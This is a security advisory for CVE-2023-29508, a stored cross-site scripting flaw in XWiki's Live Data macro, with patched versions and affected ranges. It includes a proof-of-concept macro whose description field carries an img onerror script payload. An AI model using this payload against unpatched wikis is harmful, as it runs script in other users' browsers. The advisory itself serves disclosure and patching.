GHSA-hmm7-6ph9-8jf2

Source

https://github.com/advisories/GHSA-hmm7-6ph9-8jf2

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-hmm7-6ph9-8jf2/GHSA-hmm7-6ph9-8jf2.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-hmm7-6ph9-8jf2

Aliases

CVE-2023-29508

Published

2023-04-12T20:36:36Z

Modified

2023-11-08T04:12:19.409299Z

Severity

8.9 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L CVSS Calculator

Summary

org.xwiki.platform:xwiki-platform-livedata-macro vulnerable to Basic Cross-site Scripting

Details

Impact

A user without script rights can introduce a stored XSS by using the Live Data macro, if the last author of the content of the page has script rights.

For instance, by adding the LiveData below in the about section of the profile of a user created by an admin.

{{liveData id="movies" properties="title,description"}}
{
  "data": {
    "count": 1,
    "entries": [
      {
        "title": "Meet John Doe",
        "url": "https://www.imdb.com/title/tt0033891/",
        "description": "<img onerror='alert(1)' src='foo' />"
      }
    ]
  },
  "meta": {
    "propertyDescriptors": [
      {
        "id": "title",
        "name": "Title",
        "visible": true,
        "displayer": {"id": "link", "propertyHref": "url"}
      },
      {
        "id": "description",
        "name": "Description",
        "visible": true,
        "displayer": "html"
      }
    ]
  }
}
{{/liveData}}

Patches

This has been patched in XWiki 14.10, 14.4.7, and 13.10.11.

Workarounds

No known workaround.

References

https://jira.xwiki.org/browse/XWIKI-20312

For more information

If you have any questions or comments about this advisory:

Open an issue in Jira
Email us at Security ML

Database specific

{
    "nvd_published_at": "2023-04-16T08:15:00Z",
    "github_reviewed_at": "2023-04-12T20:36:36Z",
    "severity": "HIGH",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-79",
        "CWE-80"
    ]
}

References

Affected packages

Maven / org.xwiki.platform:xwiki-platform-livedata-macro

Package

Name: org.xwiki.platform:xwiki-platform-livedata-macro; View open source insights on deps.dev
Purl: pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro

Affected ranges

Type: ECOSYSTEM
Events: Introduced

13.10.10

Fixed

13.10.11

Maven / org.xwiki.platform:xwiki-platform-livedata-macro

Package

Name: org.xwiki.platform:xwiki-platform-livedata-macro; View open source insights on deps.dev
Purl: pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro

Affected ranges

Type: ECOSYSTEM
Events: Introduced

14.4

Fixed

14.4.7

Maven / org.xwiki.platform:xwiki-platform-livedata-macro

Package

Name: org.xwiki.platform:xwiki-platform-livedata-macro; View open source insights on deps.dev
Purl: pkg:maven/org.xwiki.platform/xwiki-platform-livedata-macro

Affected ranges

Type: ECOSYSTEM
Events: Introduced

14.9

Fixed

14.10